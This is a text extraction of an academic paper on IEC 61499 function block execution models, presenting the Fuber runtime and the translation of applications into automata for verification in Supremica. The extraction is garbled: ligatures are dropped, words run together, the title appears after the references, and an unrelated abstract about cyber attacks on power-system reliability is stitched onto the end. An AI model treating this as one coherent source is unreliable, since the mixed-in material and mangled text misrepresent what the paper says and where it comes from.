the existing stan- dard IEC 61131 to facilitate the development of distributedcontrol systems. A number of development environments forIEC 61499 have emerged, including FBDK [11], CORFU [12],Torero [13] and ISaGRAF [14]. There are also IEC 61499runtime environments which focus on real-time execution ofFB applications, RTSJ-AXE [15] and RTAI-AXE [16]. Current research on the IEC 61499 standard has focused on architectures for building control application [17] [20]; veri cation of applications [21] [23] and performance analysis of runtime environments [24]. The IEC 61499 standard hasstandardized how a single function block should be executedbut not an execution model for function block networks. Thispaper analyzes the consequences of not having a standardizedexecution model for function block networks. We show howthe same application, when executing in two different standardcompliant runtime environments, may have different logicalbehavior and potentially harm humans or equipment that are interacting with the control system. Thus, moving an application from one runtime environment to another mightrequire a rewrite of the entire application, or a part of it,for correct behavior of the control system. A well de ned execution model is therefore necessary both for being ableto build reusable software components and for being able toverify the behavior of the control application. The choice ofexecution model also has consequences on the performanceof run-time environment. To the authors best knowledge the importance of the function block network execution model on the behavior of the IEC 61499 application has not beenpublished before. In this paper a new runtime environment is also introduced, Fuber [25]. A formal execution model is de ned for Fuber making the behavior deterministic, and thus predictable, andpossible to analyze using existing tools for formal veri cation and synthesis. Translation of an IEC 61499 application running inside Fuber to a set of interacting state automata is presented. The behavior may then be analyzed in standard tool for supervisorveri cation and synthesis, e.g. Supremica [26]. The automata models may also be used for synthesis of scheduling functionso that a given behavior speci cation is satis ed. The paper is organized as follows. In Section II the termi- nology of IEC 61499 standard is introduced. This is followed 1269 1-4244-0681-1/06/$20.00 '2006 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. by an analysis of different execution models in Section III that shows the importance of a well de ned execution environment. In Section IV, a new execution runtime is presented. InSections V and VI the models for two different runtimeenvironments, of which one is Fuber, are presented. The paperis ended with the conclusion. II. IEC 61499 B ASICS In this section the basic terminology from the IEC 61499 standard is introduced. The architecture is based on functionalsoftware units called function blocks where the basic function block type is the basic entity. In Fig. 1(a) the anatomy of a basic function block type is presented. The basic function block executes algorithmsbased on the arriving events and generates new events thatare passed on when the algorithms nish execution. The algorithms use data associated with incoming events to updateinternal variables and produce output data. When an algorithm has terminated an output event is generated triggering another function block for execution. The Execution Control Chart (ECC), of which an example can be seen in Fig. 1(b), determines which algorithm toexecute based on the current input event and values of input,output and internal variables. When a state is entered each action associated with the state is executed once and the ECC stays in the state until a condition for entering another stateis ful lled. The conditions upon which transitions occur are boolean expressions involving input events and input, outputand local variables. A special case of a transition condition isone labeled with 1 , which means that it is always true andis taken as soon as all actions of a state are executed. Basic function blocks are connected together by event and data connections into function block applications. For anexample of a complete application see Fig. 3. The appli-cations can be executed using the runtime environment thatimplements the execution model de ned by the standard. It is however important to note how the standard does not de ne in which order the function blocks should be executed. In thenext section we show with a simple example how this mayhave large consequences for the logical behavior of the control system. III. A NALYSIS OF EXECUTION MODEL In this section the importance of a well de ned execution environment is shown. First, a simple example is introducedand different block scheduling orders are discussed. Second,how to handle events that occur close to each other in time isdiscussed. Finally a conclusion about the execution model ispresented. A. Block Scheduling Order To show the importance of different block execution orders a simple example is used, see Fig. 2. A requirement for thecontrol system is that the OpenClamp algorithm is executed before the PushOut algorithm. A straightforward implemen- tation of the control for this example using IEC 61499 isshown in Fig. 3. When control application is run the only block ready to execute is restart . Execution of restart generates theEvent Input Variables Event Inputs Event/Data Association Data Inputs Data Input VariablesData Output VariablesData OutputsOutputsEventVariablesEvent Output Execution Control Type Identifier Algorithms Internal Variables (a)STATE0 STATE1EI 1 (b)Initial State Transition ConditionAlgorithm Name Output Event EO ALGORITHM State Action State Fig. 1. (a)Anatomy of a basic function block. The left side of the block contains the event and data inputs while the right side contains the event anddata outputs. The basic function block contains an execution control chart (ECC) and a set of algorithms. The ECC determines which algorithm to execute. (b)An example of an execution control chart (ECC). This ECC states that if it is in STATE0 and input event EIis received, the ECC transfers to stateSTATE1 and schedules the algorithm named ALGORITHM for execution. After ALGORITHM has terminated the output event EOis generated, and the ECC returns immediately to state STATE0 since the transition condition is 1 (true). /0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0 /0/0/0/0/0/0/0/0/0/0 /0/0/0/0/0/0/0/0/0/0 /0/0/0/0/0/0/0/0/0/0 /0 /1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1 /1/1/1/1/1/1/1/1/1/1 /1/1/1/1/1/1/1/1/1/1 /1/1/1/1/1/1/1/1/1/1 /1 /0/0/0/1/1/1clamp workpiece fixture carriage Fig. 2. The example contains a xture for holding a workpiece and an automatic carriage. The workpiece is processed in the xture. After processing the carriage is brought to the xture as the clamp is opened. When the carriage is in place the workpiece is pushed out and falls into the carriage. The carriage transports the workpiece to a buffer. output event COLD which is an input event to split .A s a consequence output events EO1 andEO2 are generated insplit . At this point both carriage andfixture receive input events. Here the standard does not de ne if carriage should be executed before fixture or the other way around. The standard also allows carriage and fixture to execute concurrently. Assume that carriage executes resulting in another input event to fixture .N o w the only block ready to execute is fixture . According to the standard it is possible for fixture to execute EI1 before EI2 or vice versa. Note, that if EI1 is executed rst then the OpenClamp algorithm is executed before the PushOut algorithm, but if EI2 is executed before EI1 then the PushOut is executed before OpenClamp , possibly resulting in destroyed equipment. Thus, the same standard compliant application executing within two standard compliant runtime environments mayresult in very different behaviors. It is possible to argue thatgiven the speci ed requirements the application should have been implemented in a different way. However, that is besidethe point. Eventually, this subtle problem will arise when theapplication is moved from one runtime environment to another. 1270 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. restart COLD E_RESTARTsplit EIEO1 EO2 E_SPLIT2carriage EI EO CARRIAGE fixture EI1 EI2 FIXTUREE_SPLIT2 ECC: EO1 EO2EI 1 CARRIAGE ECC: 1EI GetCarriage EOFIXTURE ECC: EI211EI1 OpenClamp PushOut Fig. 3. To the top the function blocks used for control of the application presented in Fig. 2 i shown. To the bottom of the gure the execution control charts of the function blocks are shown. B. Contiguous Events Events that occur close to each other in time are common in reactive and distributed control systems; hence it is desirablethat a standard is explicit on how these contiguous eventsare handled. This section presents what the standard states about contiguous events and how that is implemented in some available runtime environments. Two different cases of contiguous events are discussed: multiple events on different event inputs and multiple events on the same event input. The two cases deal with eventsarriving simultaneously, or almost simultaneously, at the eventinputs of the same function block. For example, one eventarriving to the function block when the block s ECC is busyexecuting an algorithm triggered by the previous event. In the standard [8] the behavior of the ECC is de ned in section 5.2.2.2. It is stated that all operations from invokingof the ECC (which is activated by the arrival of an event atan event input) until there are no more ECC transitions thatcan be taken, should be implemented as a critical region . Our interpretation of this statement is that events arriving while the ECC is busy should not be discarded, instead they should be saved in a queue for later handling. It might be possible toinstead interpret this so that arriving events are discarded whenthe ECC is busy. The latter interpretation could have advan-tages in real-time systems but can lead to undesired behaviorin some applications, for instance the example presented laterin this section. Furthermore, as the standard was interpreted,the event queue does not necessarily have to be a rst-in- rst-out queue. How the queue is implemented may also have important consequences for the behavior of an application, possibly resulting in undesired behavior. To investigate further how contiguous events are handled in different runtime environments an example function block application was used. The application tests the two casesof contiguous events in two available runtime environments.Fuber runtime environment, presented later in this paper, andISaGRAF 5.0 [14], the rst commercially available IEC 61499 runtime and development environment. Fuber is designed fromground up to be an IEC 61499 runtime environment, whileE_RESTARTrestart COLD WARM START STOP E_CYCLEcycle1 DTINCR COUNTERcounter STOPEO START STOP E_CYCLEcycle2 DTEOEI1 EI2 E_MERGEmerge EO t#1 sSTART EO1 EOEI2 EI1b)a) Fig. 4. a) Example application producing simultaneous events. b) ECC for the standard event function block E MERGE. ISaGRAF appears to be an implementation of the IEC 61499 on top of an existing scan-cycle based IEC 61131 runtime. The example application is shown in Fig. 4a. Two ECYCLE blocks produce events which go to the merge block at the same time. Events generated by the merge block then go into a counter block which simply counts the number of arriving events. The ECC for the standard EMERGE function block type is shown in Fig. 4b. Running the application during xseconds, the counter should count 2xevents. When application is executed in Fuber thecounter counts 2xevents while in the scan-cycle based ISaGRAF runtime the counter only counts xevents. This means that every other event has been lost. The problem with the scan cycle-based runtime is that multiple events on different event inputs are not detected bythemerge block and when the ECC is executed for one event the other event is discarded. Hence ISaGRAF has not interpreted, or at least not implemented, the standard the same way as we have, possibly due to the scan-cycle based strategy.This particular problem could however be solved by making anewmerge block with a different ECC which distinguishes between the case when one event arrives on either event inputand the case when an event arrives on both event inputssimultaneously. In the second case the new merge block sends out two output events. Using this solution for the merge block the problem then moves to the counter function block which now does not detect the two events arriving almost simultaneously at the same event input. The solution to the contiguous events problem then requires adjustments to underlying runtime implementation so thatsimultaneously arriving events on an event input are correctly reported to the ECC. Neither of the cases of contiguous events are a problem when function block applications are executedin the Fuber runtime environment since all incoming eventsare reported to the ECC. C. Conclusion about the Execution Model Due to the possible incompatibility between runtime en- vironments presented above, a developer writing IEC 61499 control applications has to be extremely careful if portabilitybetween runtime environments is important. To achieve truewrite once execute on every IEC 61499 runtime environmentkind of portability it is necessary to standardize on a single orpossibly a small number of application execution models (asopposed to function block execution models). Also, in those 1271 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. cases where portability is not interesting it is important to have a well de ned execution model to be able to analyze the behavior of the application using available tools for formalveri cation. Driven by interest in formal veri cation of IEC 61499 applications a new IEC 61499 runtime environment with awell de ned and thus analyzable execution model has been implemented. In next section this new runtime environment, called Fuber is presented. IV . F UBER Fuber (FUnction Block Execution Runtime) is developed in Java using an open source license and the completesource code is available at [25]. Fuber is able to open manyIEC 61499 compliant applications and execute them. Unlike most other runtime environments Fuber does not compile the algorithms before execution instead the algorithms areinterpreted using BeanShell, [27], which makes it possible toupdate the behavior of an application during execution, a fea-ture that might be useful for debugging and high-availabilityapplications. A. Current Limitations Current limitations of Fuber are that the algorithms must be implemented in Java and that composite data types for variables are not handled. At this point there is also no built in support for distributing applications to multiple resources.There is currently no graphical user interface, instead it iscontrolled by a command line interface. Also there is nosupport for ensuring timeliness of the executed applicationsand no real-time aspects of the runtime environment whereconsidered. Fuber is prepared to be able to update functionblock types and instance as well as connections between func-tion block instances while the application is executing, making it easy to recon gure the control software. It is however not possible to trigger the updates using external Fuber interfaceyet. We are working on removing these limitations. B. Implementation In order to be able to develop a formal execution model some implementation details of Fuber are introduced. Theterminology in this section follows to a large extent theterminology as de ned in the standard [8]. A UML class diagram, [28], of the design of function block scheduler in Fuber is shown in Fig. 5. The schedulerholds references to function block instances scheduled forexecution, algorithm jobs scheduled for execution and eventand algorithm executing threads. BasicFBInstance class in Fig. 5 holds all information speci c to a basic function block instance, that is among other: a reference to the ECC, algorithm de nitions, instance s variables (input data, output data and local) and event input queue. Event input queue is a FIFO-queue and it is used forholding incoming input events. Incoming events are queuedtogether with their associated data which is sampled at thetime when event is received. This design is used in order toavoid the problem of event loss in cases when several eventsarrive in close succession (as discussed in Section III-B) andScheduler + getNextScheduledFBInstance (): FBInstance + getNextScheduledJob ():Job+ scheduleFBInstance (fbInst : FBInstance ):void + scheduleJob (job :Job):void Job Algorithm Variables BasicFBInstancefbInstance scheduledJobs * FBInstancescheduledFBInstances *EventExecutingThread AlgorithmExecutingThread eventThreads 1..* algorithmThreads 1..* Fig. 5. UML class diagram of the scheduler implementation in Fuber. when an event arrives while the receiving instance is busy handling an earlier event. For the same reason the design with two types of threads is used. Event executing thread takes care of incoming events,some of which sould not be discarded, while function blockinstance s algorithm job is executing in algorithm executingthread. If only a single thread was used for both purposes all incoming events during the execution of function block s algorithms would not be noticed by the execution thread. In Fuber it is possible to create a number of algorithm executing threads and event executing threads, but in orderto keep the complexity down, this paper discusses only thecase when one thread of each kind is used. 1) Event Executing Thread: Event executing thread is servicing the scheduled function block instances queue (seeFig. 5), which is implemented as a FIFO-queue. The queueholds function block instances that have announced to the scheduler that they have input events to handle. When the thread is nished servicing the previous function block in- stance it takes a new one by removing it from the queueand invokes its handleEvent() method. In this method the ECC of the instance is run for every event in the instance sevent input queue until an ECC transition res. Then the rst action, if any, of the new state is analyzed and if it has de ned an algorithm to run an algorithm execution job is queued inthe schedulers scheduledJobs queue. When the algorithm execution job is queued the thread takes new function block instance from the scheduledFBInstances queue. Formal de nition of event executing thread presented in pseudo code follows: Event Executing Thread loop next scheduler.getNextScheduledFBInstance() next.handleEvent() end loop Following procedures are methods of BasicFBInstance class. Attributes without type speci ed in front of them are class attributes (not static). procedure HANDLE EVENT () queuedInScheduler false handlingEvent true ECState newECState null while newECState=null AND eventInputQueue.size()>0 do 1272 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. currentEvent getNextEvent() set all input event variables to false set current input event var to truecopy data inputs from event buffer to variablesnewECState updateECC() end while ifnewECState /negationslash=null then handleNewState(newECState) else handlingEvent false end if end procedure procedure HANDLE NEWSTATE (state) currentECState state actionsIterator currentECState.actionsIterator() handleState() end procedure procedure HANDLE STATE () ifNOT actionsIterator.hasNext() then set current input event var to false Repeat handling of the state if state changes. ECState newECState updateECC() ifnewECState /negationslash=null then handleNewState(newECState) else ifNOT queuedInScheduler AND eventInputQueue.size()>0 then scheduler.scheduleFBInstance(this)queuedInScheduler true end if handlingEvent false end if else if actionsIterator.hasNext() then handleAction(actionsIterator.next()) end if end procedure procedure HANDLE ACTION (action) currentECAction action ifcurrentECAction has algorithm then submit algorithm execution job else if currentECAction has event output then sendEvent() end if end procedure procedure SEND EVENT () ifcurrentECAction has event output then call receiveEvent() of the FB instance on the output connection end ifhandleState() end procedure procedure RECEIVE EVENT (eventInput) create newEventget data inputs for eventInput and store them in newEvent eventInputQueue.add(newEvent)ifnot (queuedInScheduler or handlingEvent) then scheduler.scheduleFBInstance(this) queuedInScheduler true end if end procedure 2) Algorithm Executing Thread: The algorithm execution queue, which also is a FIFO-queue, is serviced by the algo-rithm execution thread. When the thread nishes with previous job it takes a new one by removing it from the queue andexecuting its algorithm with the job s variables. When thealgorithm has nished the thread invokes the sendEvent() method of the job s basic function block instance object. The method checks if there is an output event de ned in the action for which the job was queued and, if there is, sends an eventto function block instance connected on that event output. Thereceiving instance then queues the incoming event on its inputevents queue. The sendEvent() method then takes the next de ned action in the ECC state and either queues another algorithm execution job or sends an output event dependingon if algorithm is de ned in the action or not. If there is no another action the method updates the ECC and if transition res it handles the new ECC state in the same way that the event executing thread does by examining the actions andqueuing any eventual algorithms de ned or sending output events. When this is done the thread takes a new job fromthe algorithm execution queue. Formal de nition of algorithm executing thread presented in pseudo code follows: Algorithm Executing Thread loop Job currentJob scheduler.getNextScheduledJob() execute current job update local and output variablescall sendEvent() of current job s instance end loop V. F ORMAL MODELING This section presents an automata model of a function block application running in Fuber runtime environment based on the execution de nition presented in previous section. To obtain the automata model of a function block application running inthe Fuber runtime following steps need to be done: Generate models of instance queue and algorithm job queue. Generate event execution model. For each basic function block generate models of event receiving, event handling, event input queue and ECChandling. Generate models of service function blocks. Generate models of composite function blocks. Generate models of instance connections in the applica-tion. In this paper the focus is on generating models that can be analyzed in Supremica [26], [29], [30]. The basic modelin Supremica is interacting nite automata. An automaton consists of states, transitions and an alphabet of events. Atransition is associated with a number of events. If the same event is associated with transitions that belong to two different automata, then both of the automata must be in a state wherethat event can occur in order for that event to be allowed inthe global behavior of the system. This type of model canbe used to verify and synthesize supervisors that ful ll given speci cations. A. Formal Models The models representing the instance and algorithm queues of the scheduler depend on the number of elements that maybe placed on the queue and the maximal length of the queue.To explain the generation the example from Section III A isused. In order to keep the generated automata as small aspossible the E RESTART function block is left out from the discussion below. 1) Scheduled Function Block Instance Queue Model: The scheduled function block instance queue is a rst-in- rst-out (FIFO) queue. The queue contains all function block instancesthat have an event ready to execute. A given function blockinstance may occupy only one place in the queue at anytime. This is the result of design decision to only queue theinstance when it has input events to handle. If the instancehave more than one input event to handle it queues it self 1273 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. p3=queue_fb_fixturep2=queue_fb_carriagep1=queue_fb_split r1=handle_event_split r2=handle_event_carriager3=handle_event_fixturer2r3p1 r1 p3 p2 r3p1p3 r2p3 r1 r1r3r2 p1p2p2 Fig. 6. Automaton model of the function block instance queue in Fuber for the example application. Each function block instance can be represented atmost once in the queue, which is a rst-in- rst-out queue. In this speci c application any two of the function blocks may be in the queue but not all three simultaneously. p1=queue_job_carriage_GetCarriage p2=queue_job_fixture_OpenClampp3=queue_job_fixture_PushOut r1=finished_job_carriage_GetCarriage r2=finished_job_fixture_OpenClampr3=finished_job_fixture_PushOut r1r3 r1 r1p1 r2 p2p3 r1 p1 p2p3 Fig. 7. Automaton model of algorithm job queue in Fuber for the example application. Some transition are removed for clarity. after each scheduled handling of event. The function block instance queue is presented in Fig. 6. The automaton model inthe gure can be automatically generated when the application is known. 2) Scheduled Jobs Queue Model: The model of the sched- uled jobs queue is also a FIFO-queue. The length of this queueis determined by the length of the function block instancequeue. A model is shown in Fig. 7. 3) Event Execution Model: Event execution model speci- es that each function block instance must wait for another instance to nish its event handling before it can begin its own event handling. This can be modeled as shown in Fig. 8. 4) Function Block Instance Speci c Models: Each function block will have four corresponding automata; the receiving event automaton ,t h e event handling automaton ,t h e event input queue automaton ,a n dt h e ECC handling automaton . Each of these automata, expect the ECC handling automaton,has the same structure for all function blocks. The onlydifference is in which events that are associated with thetransitions. The automata models in this section describes the same behavior as the pseudo-code in section IV, for the casewhen there is one event execution thread and one algorithm execution thread. a) Event input queue, Receiving event and event handling automata: Model of event input queue represents the behavior handle_event_carriagehandle_event_split handle_event_fixturehandling_event_done_split handling_event_done_carriage handlling_event_done_fixture Fig. 8. Automaton model of event execution in Fuber for the example application.of the queue that holds incoming events for basic function block instances. This queue model cooperates with eventreceiving and event handling models to represent handling ofincoming events in FIFO order. The queue, receiving eventand event handling automata for the xture function block are shown in Fig. 9, 10 and Fig.11. p1=receive_event_fixture_EI1 p2=receive_event_fixture_EI2 r1=event_fixture_EI1 r2=event_fixture_EI2 e=get_event_fixturer1 p1 er2 p2 e r1 r2 r1 p1p2eeep1p2 er2 Fig. 9. Automaton model of fixture event input queue. received_event_fixture_EI1 received_event_fixture_EI2receive_event_fixture_EI1 receive_event_fixture_EI2 received_event_fixture_EI1 received_event_fixture_EI2 receive_event_fixture_EI1 receive_event_fixture_EI2 handle_event_fixturequeue_fb_fixturequeue_fb_fixture handling_event_done_fixturehandling_event_done_fixture handle_event_fixture Fig. 10. Automaton model of fixture event receiving. get_event_fixture update_ECC_fixture no action fixtureno_transition_fired_fixturehandling_event_done_fixture handle_event_fixture Fig. 11. Automaton model of fixture event handling. b) ECC handling automaton: The ECC model describes what happens during ECC handling, see Section IV. This model interacts, using shared events, with event handlingmodel to indicate when there are no more actions left foran ECC state or when an ECC transition have not red. The ECC structure determines what the model looks like and it canbe automatically generated using the ECC description. Onenecessary restriction, for the automatic analysis in this paper,is that ECCs only use event inputs in boolean expressions ofECC state transitions. The ECC handling automaton for the xture function block is shown in Fig 12. The other two basic function blocks, split and carriage , are modeled in the same way. 5) Service and Composite Function Block Models: Com- posite function blocks are modeled by connection modelsconnecting their external event inputs and outputs with internalfunction blocks using connection models. 1274 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. event_fixture_EI1 queue_job_fixture_PushOutupdate_ECC_fixture no_action_fixtureupdate_ECC_fixture no_action_fixturehandling_event_done_fixture handling_event_done_fixture update_ECC_fixture event_fixture_EI2 queue_job_fixture_OpenClamp finished_job_fixture_OpenClampfinished_job_fixture_PushOut no action fixtureupdate_ECC_fixtureno_action_fixtureupdate_ECC_fixture Fig. 12. Automaton model of fixture ECC handling. receive_event_carriage_EI send_event_split_EO1 Fig. 13. Automaton model of event connection between split.EO1 and carriage.EI . Since service function block implementation is runtime spe- ci c the models of those blocks have to be hand crafted. Only service interface function block in the example applicationisrestart block. It is modeled by a single transition on send output restart cold event from initial state. 6) Connection Models: Event connections of the applica- tion are all modeled by two state automata since the standardde nes one to one event connections. The models simply represent the behavior that the input event of the receivinginstance must come after the output event of sending instance. Connections of the example are modeled accordingly by two state automatons with corresponding event output and event input on transitions. The connection between split instance s EO1 event output and carriage sEIevent input is shown in Fig. 13. In the next section formal models are used to verify if given speci cations are ful lled. VI. F ORMAL ANALYSIS OF TWOEXECUTION MODELS In section III-A it was shown informally how two function block network execution models could give rise to differentlogical behavior of the same function block application. Inthis section we return to the example and show formally,using Supremica, how one execution model will ful ll the speci cation but the other will not. A. Alternative Runtime Environment An alternative approach for the runtime implementation is a single thread function block execution that follows eventpropagation through blocks. This implementation approach means that a function block with an ECC state, which has more than one action with event output de ned, is executed in such way that when rst output is sent the receiving block updates its ECC according to received event, executes algorithms andsends its event outputs which in turn continue the chain beforethe ow of control is returned to the rst block to send the next event output de ned in the ECC state.handling_event_done_carriage_EIsend_event_split_EO1receive_event_split_EIhandling_event_done_split_EI handling_event_done_fixture_EI1 send_event_split_EO2 Fig. 14. Automaton model of split instance. In the example application this means that the split block sends EO1,t h e carriage receives EI, executes its algorithm, and sends EO.T h e fixture receives EI2 and executes its algorithm. Then the execution control is broughtback to split block, which sends EO2 event. This behavior is represented by models of example appli- cation instances that are shown in Fig. 14, Fig. 15(a) andFig. 15(b). Connection models are the same as in previoussection. B. Formal analysis Methods and tools of supervisory control theory [30], [31] may be used with automata models to verify that a givenbehavior speci cation is satis ed by a model description. The same method and tools may also be used for synthesis ofscheduling function for the function blocks represented by theautomata models so that the speci cation is satis ed. The speci cation for correct behavior of the example con- trol application (see Section III Fig. 3) is that OpenClamp algorithm is executed before PushOut algorithm. This spec- i cation is represented by automata models shown in Fig 16. To verify if the speci cation is satis ed by automata models the Supremica tool [26] was used. Checking if the speci ca- tion above is ful lled can be formulated as a nonblocking veri cation problem. To verify if a system is nonblocking Supremica requires the user to specify accepting states. Inthis example all states except the non-initial states in thetwo speci cation automata are treated as being accepting. Nonblocking veri cation of the models and speci cations above shows that the speci cation is ful lled for the Fuber case while this is not the case for the alternative runtime. Note, that this analysis does not say that the Fuber execution modelis correct for other applications only that the speci cation is ful lled for this speci c application using the Fuber runtime. VII. C ONCLUSION In order to reduce the time to develop distributed control systems and to use new tools for nding misbehavior of the application during development a new standard for distributed control systems is needed. The IEC 61499 standard is a step in the right direction, however if an IEC 61499 applicationis expected to behave the same under two different runtimeenvironments the standard needs to more clearly specify theexpected behavior of the scheduling function and how eventsbetween function blocks are propagated. In order to be able to experiment with multiple execution models Fuber, a runtime for IEC 61499 applications, has beendeveloped. Some initial results of how it is possible to generate 1275 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. send_event_carriage_EOrun_algorithm_carriage_GetCarrigehandling_event_done_carriage_EI receive_event_carriage_EI handling_event_done_fixture_EI2 (a) Model of carriage instance.receive_event_fixture_EI2 run_algorithm_fixture_PushOutreceive_event_fixture_EI1 run_algorithm_fixture_OpenClamphandling_event_done_fixture_EI1 handling_event_done_fixture_EI2 (b) Model of fixture instance. Fig. 15. Automata models for alternative runtime implementation. finished_job_fixture_PushOut finished_job_fixture_OpenClamp (a) Model for Fuber.run_algorithm_fixture_PushOut run_algorithm_fixture_OpenClamp (b) Model for alternative runtime approach Fig. 16. Model of the speci cation of correct behavior for example application in Fig. 3. Both speci cations model the same behavior. a formal model of an IEC 61499 application running inside Fuber have been presented. The formal model is expressed asa set of interacting automata in a format that is understood bythe tool for supervisor veri cation and synthesis, Supremica. Since Fuber is developed under an open-source license others are welcome to start playing with it and possiblycontribute some new features. R EFERENCES [1] IEC, IEC 61131 programmable controllers part 3: Programming lan- guages, International Electrotechnical Commission, Tech. Rep., 1993. [2] R. W. Lewis, Programming Industrial Control Systems using IEC 1131- 3. The Institution of Electrical Engineers, 1995. [3] OMG, Common object request broker speci cation: Core speci ca- tion, Object Management Group, Tech. Rep., 2004. [4] D. Box, Essential COM . Addison-Wesley Professional, 1997. [5] W3C, SOAP version 1.2 part 1: Messaging framework, World Wide Web Consortium, Tech. Rep., 2004. [6] ISO, Industrial automation systems manufacturing message speci cation part 1: Service de nition, International Organization for Standardization, Tech. Rep., 2003. [ 7 ]F .I w a n i t za n dJ .L a n g e , OPC Fundamentals, Implementation and Application . Hthig Fachverlag, 2006. [8] IEC, IEC 61499-1: Function blocks part 1: Architecture, Interna- tional Electrotechnical Commission, Tech. Rep., 2005. [9] R. W. Lewis, Modelling Control Systems Using IEC 61499 .T h e Institution of Electrical Engineers, 2001. [10] H. Hanisch and V . Vyatkin, Acheiving recon gurability of automation systems by using the new international standard IEC 61499: A devel- oper s view. in The Industrial Information Technology Handbook . CRC Press, 2005, pp. 1 20. [11] J. H. Christensen, Function block development kit. [Online]. Available: http://www.holobloc.com [12] K. C. Thramboulidis and C. S. Tranoris, Developing a CASE tool for distributed control applications, Journal of Advanced Manufacturing Technology , vol. 24, no. 1 2, pp. 24 31, July 2004. [13] TORERO Project. [Online]. Available: http://www.uni- magdeburg.de/iaf/cvs/torero [14] IsAGraf ICS Triplex. [Online]. Available: http://www.isagraf.com [15] K. Thramboulidis and A. Zoupas, Real-time java in control and automation: A model driven development approach, in Proceedings of 10th IEEE International Conference on Emerging Technologies and Factory Automation (ETFA 05) , 2005. [16] G. Doukas and K. Thramboulidis, A real-time linux execution en- vironment for function-block based distributed control applications, inProceedings of 3rd IEEE International Conference on Industrial Informatics (INDIN 05) , 2005.[17] K. Thramboulidis, Development of distributed industrial control appli- cations: The CORFU framework, in 4th IEEE International Workshop on Factory Communication Systems . Institute of Electrical and Elec- tronics Engineers Inc., Piscataway, NJ, USA, 2002, pp. 39 46. [18] Archimedes system platform. [Online]. Available: http://seg.ee.upatras.gr/MIM/archimedes.htm [19] V . Vyatkin, J. Christensen, and J. Lastra, OOONEIDA: An open, object- oriented knowledge economy for intelligent distributed automation, IEEE Transactions on Industrial Informatics , vol. 1, no. 1, pp. 4 7, 2005. [20] G. Cengic, K. Akesson, B. Lennartson, C. Yuan, and P. Ferreira, Im- plementation of full synchronous composition using IEC 61499 function blocks, in Proceedings of the 2005 IEEE International Conference on Automation Science and Engineering . Edmonton, Canada: Institute of Electrical and Electronics Engineers Inc., Piscataway, NJ, USA, Aug. 2005, pp. 267 72. [21] V . Vyatkin and H.-M. Hanisch, Formal modeling and veri c a t i o ni nt h e software engineering framework of IEC 61499: a way to self-verifying systems, in Proceedings of 8th International Conference on Emerging Technologies and Factory Automation, ETFA 2001 , vol. 2, 2001, pp. 113 18. [22] C. Schnakenbourg, J.-M. Faure, and J.-J. Lesage, Towards IEC 61499 function blocks diagrams veri cation, in Proceedings of 2002 IEEE International Conference on Systems, Man and Cybernetics , vol. 3, 2002. [23] M. Bonfe and C. Fantuzzi, Design and veri cation of mechatronic object-oriented models for industrial control systems, in 2003 IEEE Conference on Emerging Technologies and Factory Automation. Pro- ceedings , vol. 2, Lisbon, Portugal, 2003, pp. 253 60. [24] L. Ferrarini and C. Veber, Implementation aproaches for the execution of IEC 61499 applications, in Proceedings of 2004 2nd IEEE Inter- national Conference on Industrial Informatics . Institute of Electrical and Electronics Engineers Inc., Piscataway, NJ, USA, June 2004, pp.612 17. [25] Fuber IEC 61499 Function Block Execution Runtime. [Online]. Available: http://sourceforge.net/projects/fuber [26] Supremica. [Online]. Available: http://www.supremica.org [27] BeanShell. [Online]. Available: http://www.beanshell.org[28] G. Booch, J. Rumbaugh, and I. Jacobson, Uni ed Modeling Language User Guide . Addison-Wesley, 1997. [29] K. Akesson, M. Fabian, H. Flordal, and A. Vahidi, Supremica a tool for veri cation and synthesis of discrete event supervisors, in Proc. of the 11th Mediterranean Conference on Control and Automation , Rhodos, Greece, 2003. [30] K. Akesson, Methods and tools in supervisory control theory: Operator aspects, computation ef ciency and applications, Ph.D. dissertation, Chalmers University of Technology, G oteborg, Sweden, 2002. [31] P. J. Ramadge and W. M. Wonham, The control of discrete event systems, Proc. of IEEE , vol. 77, no. 1, pp. 81 98, 1989. 1276 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply.
Formal Modeling of Function Block Applications Running in IEC 61499 Execution Runtime Goran Cengi c and Oscar Ljungkrantz and Knut Akesson {cengic, oscar.ljungkrantz, knut }@chalmers.se Department of Signals and Systems Chalmers University of Technology Sweden
Investigating_the_impact_of_cyber_attacks_on_power_system_reliability.pdf
As power grids rely more on the open communication technologies and supervisory control and data acquisition (SCADA) system, they are becoming more vulnerable to malicious cyber attacks. The reliability of the power system can be impacted by the SCADA system due to a diverse set of probable cyber attacks on it. This paper deals with the impact of cyber attacks on power system reliability. A forced outage rate (FOR) model is proposed considering the impacts of cyber attacks on the reliability characteristic of generators and transmission lines. Different occurrences of the cyber attacks targeting the SCADA system lead to different effects on the FOR values. The loss of load probabilities (LOLP) curves in two reliability test systems are simulated based on 10 different types of attacks in the SCADA system. The simulation results illustratethat the reliability of the power system decreases as the effects of cyber attacks on SCADA become severe.
